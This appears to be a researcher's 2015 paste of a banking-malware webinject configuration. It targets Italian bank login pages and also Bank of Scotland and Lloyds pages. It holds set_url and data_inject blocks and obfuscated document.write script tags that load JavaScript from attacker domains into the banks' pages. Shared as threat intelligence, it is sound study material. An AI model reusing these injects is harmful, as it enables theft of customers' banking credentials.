
Banking Malware. Webinject for Italian Banks

guelfoweb Jun 10th, 2015 (edited) 683 Never
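  1. // Webinject analysis. Each pair below lists a targeted banking URL, then the remote script the inject loads into that page.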
  2.  
  3. // +------
  4. // | Pony and Tbag/pykbot -> https://twitter.com/kafeine/status/608598509147820032
  5. // | VT: https://www.virustotal.com/en/file/1a4a9f42c13e1928b907a03e1b50588800f8340d9335afe894a426629348aca8/analysis/
  6. // | http://blog.kleissner.org/?p=788
  7. // +------
  8.  
  9. // https://www.csebanking.it
  10. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js
  11.  
  12. // https://banking.credem.it
  13. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/credem.js
  14.  
  15. // https://www.chebanca.it
  16. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js
  17.  
  18. ========================================================================
  19.  
  20. <script type="text/javascript" id="inj_add">
  21. navigator.bot_id="user1_C4369E3B11BB4CD799D6F0780AD97B1A";
  22. document.write('<scr'+'ipt type="text/javascript" id="inj_inj" src="https://zertifikatkey.com/images/content/bankofscotland/bankofscotland.js?r='+Number(new Date())+'"></scr'+'ipt>');
  23. </script>
  24.  
  25. <script type="text/javascript" id="inj_add">
  26. navigator.bot_id="user1_C4369E3B11BB4CD799D6F0780AD97B1A";
  27. navigator.adm="https://zertifikatkey.com/images/";
  28. document.write('<scr'+'ipt type="text/javascript" id="inj_inj" src="https://zertifikatkey.com/images/content/lloydsbank/lloydsbank.js?r='+Number(new Date())+'"></scr'+'ipt>');
  29. </script>
  30.  
  31. <script type="text/javascript">
  32. if (!window.jQuery){
  33.        document.write('<scr' + 'ipt src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></scr' + 'ipt>');
  34. }
  35. </script>
  36. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js"></script>
  37.  
  38. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js"></script>
  39.  
  40.  
  41. data_end
  42. data_after
  43. data_end
  44.  
  45.  
  46. set_url https://www.csebanking.it/fec/*.html*
  47. data_before
  48. data_end
  49. data_inject
  50. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></script>
  51. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js"></script>
  52. data_end
  53. data_after
  54. <script
  55. data_end
  56.  
  57.  
  58. set_url https://banking.credem.it*
  59. data_before
  60. data_end
  61. data_inject
  62. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/credem.js"></script>
  63. data_end
  64. data_after
  65. </head>
  66. data_end
  67.  
  68. set_url https://www.chebanca.it*
  69. data_before
  70. data_end
  71. data_inject
  72. <script type="text/javascript">
  73. if (!window.jQuery){
  74.        document.write('<scr' + 'ipt src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></scr' + 'ipt>');
  75. }
  76. </script>
  77. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js"></script>  
  78. data_end
  79. data_after
  80. </head>
  81. data_end